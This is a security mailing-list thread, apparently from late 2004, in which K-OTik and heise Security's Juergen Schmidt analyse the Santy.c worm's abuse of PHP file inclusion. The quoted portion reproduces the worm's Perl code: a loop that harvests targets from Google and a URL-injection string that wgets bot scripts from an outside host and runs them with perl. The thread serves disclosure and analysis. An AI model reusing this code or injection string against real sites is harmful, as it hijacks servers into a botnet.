In-Reply-To: <Pine.LNX.4.58.0412251805110.19888@xxxxxxxxxxxxxxxx> The kids are exploiting the php file inclusion (programming flaw), well-thought-out. Thousands of vulnerable sites and potentially thousands of zombies... We labelled this Santy.c (even if the only similarity with Santy lies in "using search engines"). http://www.k-otik.com/exploits/20041225.SantyC.php http://www.k-otik.com/exploits/20041225.SantyB.php Regards K-OTik Security Research & Monitoring Team 24/7 http://www.k-otik.com >From: Juergen Schmidt <ju@xxxxxxxxx> > >Hello, > >the new santy version not only attacks phpBB. > >It uses the brasilian Google site to find all kinds of PHP skripts. >It parses their URLs and overwrites variables with strings like: > >'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget >www.visualcoders.net/spybot.txt;... > >Often enough this leads to download and execution of code. >On success the worm connects to an IRC server, where already more than 700 >zombies are waiting for commands. > >The relevant code: >--------- >$procura = 'inurl:*.php?*=' . $numr; > >for($n=0;$n<900;$n += 10){ >$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => >80, Proto => "tcp") or next; >print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n"; >... > >$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget >www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget >www.visualcod >ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget >www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl >ownz.txt;perl php.txt'; >$t =0; >$y =0; >@ja; >open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt"; >while (<opa>) >{ > $ja[$t] = $_; > chomp $ja[$t]; > $t++; > $y++; >} >close(opa); >$t=1; >while ($t < $y) > { > if ($ja[$t] =~/=/) > { > $num = rindex $ja[$t], '='; > $num += 1; > $ja[$t] = substr($ja[$t],0,$num); > open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar >caxe1.txt"; > print jaera "$ja[$t]$lista1\n"; > close(jaera); > $num = index $ja[$t], '='; > $num += 1; > $ja[$t] = substr($ja[$t],0,$num); > $num1 = rindex $ja[$t], '.'; > $subproc = substr($ja[$t],$num1,$num); > > open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar >caxe1.txt"; > print jaera "$ja[$t]$lista1\n"; > close(jaera); > } > $t++; > } > > >bye, ju > >-- >Juergen Schmidt Chefredakteur heise Security www.heisec.de >Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover >Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail ju@xxxxxxxxx >GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970 >
